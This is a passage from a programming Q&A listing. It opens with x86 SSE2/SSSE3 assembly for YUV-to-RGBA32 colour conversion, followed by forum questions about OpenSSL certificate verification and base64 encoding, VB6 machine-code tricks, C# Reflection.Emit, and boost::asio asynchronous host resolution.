            paddsw xmm3, xmm6 ; and add to r
            psraw xmm6,2 ; divide v by 4
            paddsw xmm3, xmm6 ; and add to r

        ; b = y + u + u >> 1 + u >> 2 + u >> 6
            paddsw xmm5, xmm1 ; add u to b
            psraw xmm7,1 ; divide u by 2
            paddsw xmm5, xmm7 ; and add to b
            psraw xmm7,1 ; divide u by 2
            paddsw xmm5, xmm7 ; and add to b
            psraw xmm7,4 ; divide u by 32
            paddsw xmm5, xmm7 ; and add to b

        ; g = y - u >> 2 - u >> 4 - u >> 5 - v >> 1 - v >> 3 - v >> 4 - v >> 5
            movdqa xmm7,xmm2 ; move v to scratch
            pshufd xmm6,xmm1, 0xE4 ; move u to scratch
            movdqa xmm4,xmm0 ; g = y

            psraw xmm6,2 ; divide u by 4
            psubsw xmm4,xmm6 ; subtract from g
            psraw xmm6,2 ; divide u by 4
            psubsw xmm4,xmm6 ; subtract from g
            psraw xmm6,1 ; divide u by 2
            psubsw xmm4,xmm6 ; subtract from g

            psraw xmm7,1 ; divide v by 2
            psubsw xmm4,xmm7 ; subtract from g
            psraw xmm7,2 ; divide v by 4
            psubsw xmm4,xmm7 ; subtract from g
            psraw xmm7,1 ; divide v by 2
            psubsw xmm4,xmm7 ; subtract from g
            psraw xmm7,1 ; divide v by 2
            psubsw xmm4,xmm7 ; subtract from g
        %endmacro

        ; outputer
        %macro rgba32sse2output 0
        ; clamp values
            pxor xmm7,xmm7
            packuswb xmm3,xmm7 ; clamp to 0,255 and pack R to 8 bit per pixel
            packuswb xmm4,xmm7 ; clamp to 0,255 and pack G to 8 bit per pixel
            packuswb xmm5,xmm7 ; clamp to 0,255 and pack B to 8 bit per pixel
        ; convert to bgra32 packed
            punpcklbw xmm5,xmm4 ; bgbgbgbgbgbgbgbg
            movdqa xmm0, xmm5 ; save bg values
            punpcklbw xmm3,xmm7 ; r0r0r0r0r0r0r0r0
            punpcklwd xmm5,xmm3 ; lower half bgr0bgr0bgr0bgr0
            punpckhwd xmm0,xmm3 ; upper half bgr0bgr0bgr0bgr0
        ; write to output ptr
            movntdq [edi], xmm5 ; output first 4 pixels bypassing cache
            movntdq [edi+16], xmm0 ; output second 4 pixels bypassing cache
        %endmacro

        SECTION .data align=16

        Const16 dw 16
            dw 16
            dw 16
            dw 16
            dw 16
            dw 16
            dw 16
            dw 16

        Const128 dw 128
            dw 128
            dw 128
            dw 128
            dw 128
            dw 128
            dw 128
            dw 128

        UMask db 0x01
            db 0x80
            db 0x01
            db 0x80
            db 0x05
            db 0x80
            db 0x05
            db 0x80
            db 0x09
            db 0x80
            db 0x09
            db 0x80
            db 0x0d
            db 0x80
            db 0x0d
            db 0x80

        VMask db 0x03
            db 0x80
            db 0x03
            db 0x80
            db 0x07
            db 0x80
            db 0x07
            db 0x80
            db 0x0b
            db 0x80
            db 0x0b
            db 0x80
            db 0x0f
            db 0x80
            db 0x0f
            db 0x80

        YMask db 0x00
            db 0x80
            db 0x02
            db 0x80
            db 0x04
            db 0x80
            db 0x06
            db 0x80
            db 0x08
            db 0x80
            db 0x0a
            db 0x80
            db 0x0c
            db 0x80
            db 0x0e
            db 0x80

        ; void Convert_YUV422_RGBA32_SSSE3(void *fromPtr, void *toPtr, int width)
        width equ ebp+16
        toPtr equ ebp+12
        fromPtr equ ebp+8

        ; void Convert_YUV420P_RGBA32_SSSE3(void *fromYPtr, void *fromUPtr, void *fromVPtr, void *toPtr, int width)
        width1 equ ebp+24
        toPtr1 equ ebp+20
        fromVPtr equ ebp+16
        fromUPtr equ ebp+12
        fromYPtr equ ebp+8

        SECTION .text align=16

        cglobal Convert_YUV422_RGBA32_SSSE3
        ; reserve variables
            push ebp
            mov ebp, esp
            push edi
            push esi
            push ecx

            mov esi, [fromPtr]
            mov edi, [toPtr]
            mov ecx, [width]
        ; loop width / 8 times
            shr ecx,3
            test ecx,ecx
            jng ENDLOOP
        REPEATLOOP: ; loop over width / 8
        ; YUV422 packed inputer
            movdqa xmm0, [esi] ; should have yuyv yuyv yuyv yuyv
            pshufd xmm1, xmm0, 0xE4 ; copy to xmm1
            movdqa xmm2, xmm0 ; copy to xmm2
        ; extract both y giving y0y0
            pshufb xmm0, [YMask]
        ; extract u and duplicate so each u in yuyv becomes u0u0
            pshufb xmm1, [UMask]
        ; extract v and duplicate so each v in yuyv becomes v0v0
            pshufb xmm2, [VMask]

        yuv2rgbsse2

        rgba32sse2output

        ; endloop
            add edi,32
            add esi,16
            sub ecx, 1 ; apparently sub is better than dec
            jnz REPEATLOOP
        ENDLOOP:
        ; Cleanup
            pop ecx
            pop esi
            pop edi
            mov esp, ebp
            pop ebp
            ret

        cglobal Convert_YUV420P_RGBA32_SSSE3
        ; reserve variables
            push ebp
            mov ebp, esp
            push edi
            push esi
            push ecx
            push eax
            push ebx

            mov esi, [fromYPtr]
            mov eax, [fromUPtr]
            mov ebx, [fromVPtr]
            mov edi, [toPtr1]
            mov ecx, [width1]
        ; loop width / 8 times
            shr ecx,3
            test ecx,ecx
            jng ENDLOOP1
        REPEATLOOP1: ; loop over width / 8
        ; YUV420 Planar inputer
            movq xmm0, [esi] ; fetch 8 y values (8 bit) yyyyyyyy00000000
            movd xmm1, [eax] ; fetch 4 u values (8 bit) uuuu000000000000
            movd xmm2, [ebx] ; fetch 4 v values (8 bit) vvvv000000000000

        ; extract y
            pxor xmm7,xmm7 ; 00000000000000000000000000000000
            punpcklbw xmm0,xmm7 ; interleave xmm7 into xmm0 y0y0y0y0y0y0y0y0
        ; extract u and duplicate so each becomes 0u0u
            punpcklbw xmm1,xmm7 ; interleave xmm7 into xmm1 u0u0u0u000000000
            punpcklwd xmm1,xmm7 ; interleave again u000u000u000u000
            pshuflw xmm1,xmm1, 0xA0 ; copy u values
            pshufhw xmm1,xmm1, 0xA0 ; to get u0u0
        ; extract v
            punpcklbw xmm2,xmm7 ; interleave xmm7 into xmm1 v0v0v0v000000000
            punpcklwd xmm2,xmm7 ; interleave again v000v000v000v000
            pshuflw xmm2,xmm2, 0xA0 ; copy v values
            pshufhw xmm2,xmm2, 0xA0 ; to get v0v0

        yuv2rgbsse2

        rgba32sse2output

        ; endloop
            add edi,32
            add esi,8
            add eax,4
            add ebx,4
            sub ecx, 1 ; apparently sub is better than dec
            jnz REPEATLOOP1
        ENDLOOP1:
        ; Cleanup
            pop ebx
            pop eax
            pop ecx
            pop esi
            pop edi
            mov esp, ebp
            pop ebp
            ret

        SECTION .note.GNU-stack noalloc noexec nowrite progbits


  • verifying the signature of x509

    - by sid
    Hi All, While verifying the certificate I am getting EVP_F_EVP_PKEY_GET1_DH. My aim: verify the certificate signature. I have 2 certificates: 1. a CA certificate, 2. a certificate issued by the CA. I extracted the 'RSA Public Key (key)' modulus from the CA certificate using:

        pPublicKey = X509_get_pubkey(x509);
        buf_len = (size_t) BN_num_bytes (bn);
        key = (unsigned char *)malloc (buf_len);
        n = BN_bn2bin (bn, (unsigned char *) key);
        if (n != buf_len)
            LOG(ERROR," : key error\n");
        if (key[0] & 0x80)
            LOG(DEBUG, "00\n");

    Now I have the CA public key and CA key length, and I also have the certificate issued by the CA in a buffer, the buffer length and the public key. To verify the signature, I have the following code:

        int iRet1, iRet2, iRet3, iReason;
        iRet1 = EVP_VerifyInit(&md_ctx, EVP_sha1());
        iRet2 = EVP_VerifyUpdate(&md_ctx, buf, buflen);
        iRet3 = EVP_VerifyFinal(&md_ctx, (const unsigned char *)CAkey, CAkeyLen, pubkey);
        iReason = ERR_get_error();
        if(ERR_GET_REASON(iReason) == EVP_F_EVP_PKEY_GET1_DH)
        {
            LOG(ERROR, "EVP_F_EVP_PKEY_GET1_DH\n");
        }
        LOG(INFO,"EVP_VerifyInit returned %d : EVP_VerifyUpdate returned %d : EVP_VerifyFinal = %d \n", iRet1, iRet2, iRet3);
        EVP_MD_CTX_cleanup(&md_ctx);
        EVP_PKEY_free(pubkey);
        if (iRet3 != 1)
        {
            LOG(ERROR,"EVP_VerifyFinal() failed\n");
            ret = -1;
        }
        LOG(INFO,"signature is valid\n");

    I am unable to figure out what might have gone wrong. Has anybody faced the same issue? What does the EVP_F_EVP_PKEY_GET1_DH error mean? Thanks in advance - opensid


  • Add two 32-bit integers in Assembler for use in VB6

    - by Emtucifor
    I would like to come up with the byte code in assembler (assembly?) for Windows machines to add two 32-bit longs and throw away the carry bit. I realize the "Windows machines" part is a little vague, but I'm assuming that the bytes for ADD are pretty much the same in all modern Intel instruction sets. I'm just trying to abuse VB a little and make some things faster. So... if the string "8A4C240833C0F6C1E075068B442404D3E0C20800" is the assembly code for SHL that can be "injected" into a VB6 program for a fast SHL operation expecting two Long parameters (we're ignoring here that 32-bit longs in VB6 are signed, just pretend they are unsigned), what is the hex string of bytes representing assembler instructions that will do the same thing to return the sum? The hex code above for SHL is, according to the author:

        mov eax, [esp+4]
        mov cl, [esp+8]
        shl eax, cl
        ret 8

    I spit those bytes into a file and tried unassembling them in a Windows command prompt using the old debug utility, but I figured out it's not working with the newer instruction set because it didn't like EAX when I tried assembling something but it was happy with AX. I know from comments in the source code that SHL EAX, CL is D3E0, but I don't have any reference to know what the bytes are for instruction ADD EAX, CL or I'd try it. I tried flat assembler and am not getting anything I can figure out how to use. I used it to assemble the original SHL code and got a very different result, not the same bytes. Help?


  • Dynamically overriding an abstract method in C#

    - by ng
    I have the following abstract class:

        public abstract class AbstractThing {
            public String GetDescription() {
                return "This is " + GetName();
            }
            public abstract String GetName();
        }

    Now I would like to implement some new dynamic types from this like so:

        AssemblyName assemblyName = new AssemblyName();
        assemblyName.Name = "My.TempAssembly";
        AssemblyBuilder assemblyBuilder = Thread.GetDomain().DefineDynamicAssembly(assemblyName, AssemblyBuilderAccess.Run);
        ModuleBuilder moduleBuilder = assemblyBuilder.DefineDynamicModule("DynamicThings");
        TypeBuilder typeBuilder = moduleBuilder.DefineType(someName + "_Thing",
            TypeAttributes.Public | TypeAttributes.Class,
            typeof(AbstractThing));
        MethodBuilder methodBuilder = typeBuilder.DefineMethod("GetName",
            MethodAttributes.Public | MethodAttributes.ReuseSlot | MethodAttributes.Virtual | MethodAttributes.HideBySig,
            null,
            Type.EmptyTypes);
        ILGenerator msil = methodBuilder.GetILGenerator();
        msil.EmitWriteLine(selectionList);
        msil.Emit(OpCodes.Ret);

    However, when I try to instantiate via typeBuilder.CreateType(); I get an exception saying that there is no implementation for GetName. Is there something I am doing wrong here? I cannot see the problem. Also, what would be the restrictions on instantiating such a class by name? For instance, if I tried to instantiate via "My.TempAssembly.x_Thing", would it be available for instantiation without the Type generated?


  • openssl crypto library - base64 conversion

    - by Hassan Syed
    I'm using openssl BIO objects to convert a binary string into a base64 string. The code is as follows:

        void ToBase64(std::string & s_in)
        {
            BIO * b_s = BIO_new( BIO_s_mem() );
            BIO * b64_f = BIO_new( BIO_f_base64() );
            b_s = BIO_push( b64_f , b_s);
            std::cout << "IN::" << s_in.length();
            BIO_write(b_s, s_in.c_str(), s_in.length());
            char * pp;
            int sz = BIO_get_mem_data(b_s, &pp);
            std::cout << "OUT::" << sz << endl;
            s_in.assign(pp,sz);
            //std::cout << sz << " " << std::string(pp,sz) << std::endl;
            BIO_free (b64_f); // TODO ret error potential
            BIO_free (b_s); //
        }

    The in length is either 64 or 72. However, the output is always 65, which is incorrect; it should be much larger than that. The documentation isn't the best in the world. AFAIK the bio_s_mem object is supposed to grow dynamically. What am I doing wrong?


  • boost::asio::async_resolve Problem

    - by Moo-Juice
    Hi All, I'm in the process of constructing a Socket class that uses boost::asio. To start with, I made a connect method that took a host and a port and resolved it to an IP address. This worked well, so I decided to look into async_resolve. However, my callback always gets an error code of 995 (using the same destination host/port as when it worked synchronously).

    Code: function that starts the resolution:

        // resolve a host asynchronously
        template<typename ResolveHandler>
        void resolveHost(const String& _host, Port _port, ResolveHandler _handler) const
        {
            boost::asio::ip::tcp::endpoint ret;
            boost::asio::ip::tcp::resolver::query query(_host, boost::lexical_cast<std::string>(_port));
            boost::asio::ip::tcp::resolver r(m_IOService);
            r.async_resolve(query, _handler);
        }; // eo resolveHost

    Code that calls this function:

        void Socket::connect(const String& _host, Port _port)
        {
            // Anon function for resolution of the host-name and asynchronous calling of the above
            auto anonResolve = [this](const boost::system::error_code& _errorCode,
                                      boost::asio::ip::tcp::resolver_iterator _epIt)
            {
                // raise event
                onResolve.raise(SocketResolveEventArgs(*this, !_errorCode ? (*_epIt).host_name() : String(""), _errorCode));
                // perform connect, calling back to anonymous function
                if(!_errorCode)
                    connect(*_epIt);
            };
            // Resolve the host calling back to anonymous function
            Root::instance().resolveHost(_host, _port, anonResolve);
        }; // eo connect

    The message() function of the error_code is: The I/O operation has been aborted because of either a thread exit or an application request

    And my main.cpp looks like this:

        int _tmain(int argc, _TCHAR* argv[])
        {
            morse::Root root;
            TextSocket s;
            s.connect("somehost.com", 1234);
            while(true)
            {
                root.performIO(); // calls io_service::run_one()
            }
            return 0;
        }

    Thanks in advance!

